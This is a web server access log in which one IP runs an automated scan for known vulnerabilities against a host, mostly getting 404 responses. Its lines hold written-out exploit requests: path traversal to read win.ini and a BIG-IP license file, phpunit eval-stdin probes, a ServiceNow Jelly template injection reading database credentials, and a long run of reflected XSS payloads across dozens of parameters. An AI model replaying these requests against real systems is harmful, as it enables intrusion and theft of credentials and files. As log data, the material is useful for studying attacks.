195.164.49.69 - - [18/Nov/2024:21:27:30 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:21:27:32 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:27:36 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:27:37 +0000] POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:27:37 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:27:37 +0000] POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1 404 1121
83.212.98.101 - - [18/Nov/2024:21:27:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:27:41 +0000] GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1162
195.164.49.69 - - [18/Nov/2024:21:27:43 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:27:45 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:21:27:45 +0000] GET /v1/2p2XEqH0jhC9G0kKPvZG02HXYHO.php HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:21:27:49 +0000] GET /api/v2/cmdb/system/admin HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:21:27:53 +0000] POST /aspera/faspex/package_relay/relay_package HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:21:27:54 +0000] POST /goanywhere/lic/accept HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:27:56 +0000] POST /index.php?c=blocked&action=continue HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:28:00 +0000] GET /menu/neo HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:28:01 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:21:28:07 +0000] POST /api/2.0/mlflow/registered-models/create HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:21:28:09 +0000] GET /2p2XEn3d6GbjbIh23J6dWQ6dCU8.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:29:07 +0000] GET /authenticationendpoint/2p2xem7p9zomsr2c4daohz5ygwq.jsp HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:21:29:11 +0000] GET /app?service=page/SetupCompleted HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:29:21 +0000] DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:29:22 +0000] GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:21:29:24 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:29:26 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:29:27 +0000] GET /WebInterface HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:29:30 +0000] PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:21:29:32 +0000] GET /api/server/version HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:29:35 +0000] POST /webtools/control/xmlrpc?USERNAME&PASSWORD=2p2XEwc6qaJ8ilMXdqBnScHmxlI&requirePasswordChange=Y HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:29:37 +0000] GET /api/clusters HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:29:39 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:21:29:41 +0000] GET /menu/stc HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:21:29:42 +0000] GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2p2XElZCnST1x7s2QhmoF9ebllx HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:29:45 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:29:47 +0000] GET /xyz/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:29:48 +0000] POST /api/2.0/mlflow/model-versions/create HTTP/1.1 404 1126
83.212.98.101 - - [18/Nov/2024:21:30:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:21:30:50 +0000] POST /dana-na/auth/saml-sso.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:30:52 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:30:56 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:21:30:58 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:31:00 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:31:01 +0000] POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:31:03 +0000] GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1157
195.164.49.69 - - [18/Nov/2024:21:31:05 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:31:07 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:31:11 +0000] GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:21:31:20 +0000] GET /en-US/login HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:31:22 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:21:32:27 +0000] POST /Startup/Register HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:32:31 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:32:33 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:21:32:34 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:21:32:38 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
83.212.98.101 - - [18/Nov/2024:21:32:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
- - - [18/Nov/2024:21:32:41 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:32:44 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:32:46 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:32:53 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:32:54 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:32:54 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:32:54 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:32:54 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:32:54 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:32:54 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:32:54 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:32:54 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:32:55 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:21:32:55 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:21:32:55 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:21:32:55 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:32:55 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:32:55 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:32:55 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:21:33:16 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:25 +0000] GET /?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:25 +0000] GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:25 +0000] GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?edit-menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit-menu-item%27%29%3E&error=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-error%27%29%3E&post_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_title%27%29%3E&x=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-x%27%29%3E&down=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-down%27%29%3E&state=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-state%27%29%3E&data=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-data%27%29%3E&auth=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-auth%27%29%3E&themes=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-themes%27%29%3E&captcha=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-captcha%27%29%3E&nickname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nickname%27%29%3E&allusers=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-allusers%27%29%3E&color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-color%27%29%3E&path=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-path%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?next=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-next%27%29%3E&preview=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview%27%29%3E&shortcode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-shortcode%27%29%3E&features=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-features%27%29%3E&mode=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mode%27%29%3E&out_trade_no=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-out_trade_no%27%29%3E&category=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category%27%29%3E&replytocom=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-replytocom%27%29%3E&from=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-from%27%29%3E&start=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start%27%29%3E&value=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-value%27%29%3E&range=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-range%27%29%3E&table=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-table%27%29%3E&limit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-limit%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-callback%27%29%3E&weblog_title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-weblog_title%27%29%3E&check=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-check%27%29%3E&overwrite=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-overwrite%27%29%3E&prefix=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-prefix%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-l%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-token%27%29%3E&start_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-start_date%27%29%3E&direction=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-direction%27%29%3E&ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ID%27%29%3E&pid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pid%27%29%3E&to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-to%27%29%3E&checkemail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checkemail%27%29%3E&menu-locations=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-locations%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:26 +0000] GET /?name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-name%27%29%3E&json=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-json%27%29%3E&id_base=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id_base%27%29%3E&where=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-where%27%29%3E&request=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-request%27%29%3E¬es=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-notes%27%29%3E&img=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-img%27%29%3E&a=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-a%27%29%3E&menu-item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu-item%27%29%3E&xml=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-xml%27%29%3E&columns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-columns%27%29%3E&service=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-service%27%29%3E&site_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?order_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order_id%27%29%3E&cookie=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cookie%27%29%3E&debug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-debug%27%29%3E&m=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-m%27%29%3E&dir=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dir%27%29%3E&new_role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new_role%27%29%3E&trashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trashed%27%29%3E&log=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-log%27%29%3E&excerpt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-excerpt%27%29%3E&settings-updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings-updated%27%29%3E&plugins=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugins%27%29%3E&modify=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-modify%27%29%3E&pwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pwd%27%29%3E&file=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file%27%29%3E HTTP/1.1 200 11204
